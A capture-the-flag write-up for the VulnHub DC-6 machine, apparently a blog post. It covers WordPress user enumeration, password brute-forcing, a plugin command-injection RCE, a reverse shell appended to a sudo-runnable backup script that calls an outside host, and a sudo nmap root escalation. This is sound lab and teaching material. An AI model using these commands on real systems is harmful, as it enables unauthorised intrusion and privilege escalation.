DC-6 starts off by enumerating usernames from a WordPress website. I’m able to gain a set of credentials to log into the admin panel with a brute-force attack. There is a WP Plugin which can be leveraged to gain a foothold on the system. A to-do note containing the user’s credentials is discovered while enumerating the home directory. For the root part, there is a sudo privileges on a writable backup script and nmap
which allows me to escalate to other users then straight to root.
Reconnaissance
Host Discovery — arpscan
Because 192.168.2.1 and 192.168.2.2
are virtual gateway addresses, the target machine’s IP address is most likely 192.168.2.104
.
arp-scan --interface eth0 '192.168.2.0/24' | tee scans/00-arp-scan-dc6
Nmap
With initial scan, nmap
shows two ports open: SSH on port 22 and Apache Web Server on port 80.
nmap -n -sC -sV -oA scans/10-initial-dc6 '192.168.2.104' -v
From the results above, there’s a redirection to http://wordy/
on port 80. To properly resolve the web, I’ll add wordy to my /etc/hosts
file.
echo '192.168.1.104 wordy' >> /etc/hosts
TCP 80 — Website
This page clearly states that it’s a WordPress site.
Nothing interesting to explore here, but the text secure plugins
seems to be a hint from the machine’s author.
— :: Nmap NSE
Runningnmap
script against this website finds several usernames.
nmap -p 80 --script "http-wordpress*" wordy
I’ll save those usernames into a file called users
.
— :: WPScan
wpscan
identifies two vulnerable WP plugins: an RCE and a user role privilege escalation.
wpscan --url http://wordy/ --enumerate vp --plugins-detection aggressive --api-token your_token123
I’m interested with the RCE one, but before that I’ll have to find creds.
Brute-forcing passwords
At that time, I was stuck for a couple of hours. Asking for a nudge and the answer was to brute force, I didn’t know that the box’s author actually gave us a hint to create a custom wordlist from rokyou.txt
.
I’ll create new wordlist from rockyou.txt
and then use it to perform a brute force attack using wpscan
.
wpscan --url http://wordy/ --usernames users --passwords passwords.txt
It returns one valid credentials: mark:helpdesk10
.
Foothold
Plainview Activity Monitor — RCE (CVE-2018–15877)
With the credentials I obtained, I can login into WP Dashboard.
From the previous wpscan
, I searched the exploit PoC for Plainview Activity Monitor RCE and found this from exploit-db.
The exploit PoC exploits a vulnerability that comes from this IP tools feature.
I’ll hit the lookup button and intercept the request on Burp.
RCE can be achieved by adding a set of malicious OS commands after the command pipe |
, semi colon ;
(stacked command), or logical OR ||
at the ip
section. In this case, I send a reverse shell.
Privilege Escalation
Internal enumeration
The home directory is readable by www-data
and there are two interesting files: backups.sh
and things-to-do.txt
.
I immediately checked the contents of backups.sh
and things-to-do.txt
.
The backups.sh
script is writable by group devs
, and I’ll note that.
And this things-to-do.txt
contains graham’s credentials.
SSH — Graham
I tried the graham’s creds, graham:GSo7isUM1D4
, on SSH, and it worked.
Shell as jens via sudo backups.sh
User graham
has sudo privileges on the backups.sh
script, and this allows me to run the script as user jens
.
Because the script is also writable by graham (devs
group), I can exploit this to escalate myself to jens
by adding a reverse shell line to the script and then run it with sudo.
graham@dc-6:~$ echo 'bash -i >& /dev/tcp/192.168.2.108/9000 0>&1' >> /home/jens/backups.sh
Shell as root via sudo nmap
I found out that user jens
is allowed to execute nmap
as root user.
I can also exploit this using reference from GTFObins.
jens@dc-6:/home/graham$ TF=$(mktemp)
jens@dc-6:/home/graham$ echo 'os.execute("/bin/sh")' > $TF
jens@dc-6:/home/graham$ sudo nmap --script=$TF
And here is the flag:
Originally published at: https://fahmifj.github.io/writeups/vulnhub/vh-dc6/